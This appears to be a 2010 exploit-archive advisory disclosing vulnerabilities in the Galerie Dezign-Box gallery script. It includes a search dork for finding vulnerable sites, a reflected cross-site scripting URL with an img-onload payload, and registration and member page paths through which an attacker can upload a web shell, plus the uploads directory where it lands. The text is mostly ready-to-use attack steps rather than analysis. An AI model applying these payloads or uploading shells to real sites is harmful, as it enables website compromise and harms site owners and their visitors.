[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Galerie Dezign-Box France Multi Vulnerability
# Published : 2010-02-22
# Author : indoushka
# Previous Title : vBeso v3.1.0 Local File Include Vulnerability
# Next Title : HazelPress Lite <= 0.0.4 (Auth Bypass) SQL Injection Vulnerability
========================================================================================
| # Title : Galerie Dezign-Box ? France Multi Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : www.iq-ty.com
| # Dork : Script créé par Funewik - Dezign-Box ? France
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)
| # Bug : Multi
====================== Exploit By indoushka =================================
# Exploit :
1- XSS
http://server/galerie/nom.php?id=tufgxab0x2r4xybg527w&nom=<img+src=http://server/dt.gif+onload=alert(213771818860)>
2- Upload Shell
http://server/galerie/membre/register.php (you Can Upload your Evil)
http://server/galerie/membre/membres.php (you Can Upload your Evil)
http://server/galerie/membre/uploads/ (2 find what you upload)
================================ Dz-Ghost Team ========================================
Greetz : óí?í èáúè?ó + úí? ?áè?? + ?á??? ?áúí? K10 + K@MEL + úí? ?áíáé + ê??íY
-------------------------------------------------------------------------------------------